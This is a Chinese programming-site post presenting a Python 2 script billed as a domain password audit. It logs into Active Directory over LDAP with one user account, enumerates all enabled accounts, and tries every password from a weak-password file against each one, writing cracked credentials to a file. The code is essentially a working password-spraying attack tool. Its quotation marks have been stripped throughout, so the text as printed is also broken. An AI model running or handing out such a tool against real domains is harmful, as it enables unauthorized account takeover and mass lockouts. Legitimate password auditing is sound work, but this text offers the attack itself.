当前位置:编程学习 > 网站相关 >>

域账户密码审计

 

刚学python,写得不杂好,使用前,先vi配置下几个参数,文章最后有下载地址
本地要放一个弱密码列表pwd.txt
server #ad的ip
domain #域名
username #域用户名
password #域用户的密码
base_dn #改下ou
 
#!/usr/bin/python
#coding=utf-8
import ldap
 
# password file
pass_file = "pwd.txt"
 
# ldap server configuration
server = "10.1.10.2"
domain = "microsoft.com"
username = "user"
password = "password"
 
# ldap connection configuration
base_dn = "ou=users,dc=zy,dc=com"
scope = ldap.SCOPE_SUBTREE
filters = (objectCategory=user)
attrs = None
 
# Const: Account Disable
ACCOUNTDISABLE = 2
 
def c_pwd(server, user, pwd):
 Crack pwd
 Parameters: server - ip of the ad server
     user - username that will crack
     pwd  - password of the user
 Return:     1    - cracked
     0    - crack failed
 try:
  conn = ldap.initialize(ldap://+server)
  conn.bind_s(user, pwd)
  conn.unbind_s()
  return 1
 
 except ldap.INVALID_CREDENTIALS,e:
  conn.unbind_s()
  return 0
 
def get_user(server, user, pwd):
 Get all users of ad
 Parameters: server - ip of the ad server
     user   - a normal user to get info
     pwd    - password of the normal user
 Return:     a list of users
 result = list()
 try:
  conn = ldap.initialize(ldap://+server)
  conn.bind_s(user, pwd)
  result = conn.search_s(base_dn, scope, filters, attrs)
 
 except ldap.LDAPError,e:
  print e
 
 for res in result:
  attr_dict = res[1]
  if not(int(attr_dict[userAccountControl][0]) & ACCOUNTDISABLE):
   user_list.append(attr_dict[sAMAccountName][0])
 conn.unbind_s() 
 return user_list
 
user_list = list()
user_list = get_user(server, username+@+domain, password)
 
try:
 pwd_file = open(pass_file)
 pwd_list = pwd_file.readlines()
 
 cracked_file = open("cracked.txt", w)
 
 for _user in user_list:
  for _pwd in pwd_list:
   user =  _user+@+domain
   pwd = _pwd.rstrip()
   if c_pwd(server, user, pwd):
    print cracked! username=+user+,password=+pwd
    cracked_file.write(username=+user+,password=+pwd)
    break
 print Cracked finished! You can get all cracked user in "cracked.txt"
 pwd_file.close()
 cracked_file.close()
 
except IOError:
 print open password file: failed!

补充:Web开发 , Python ,
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,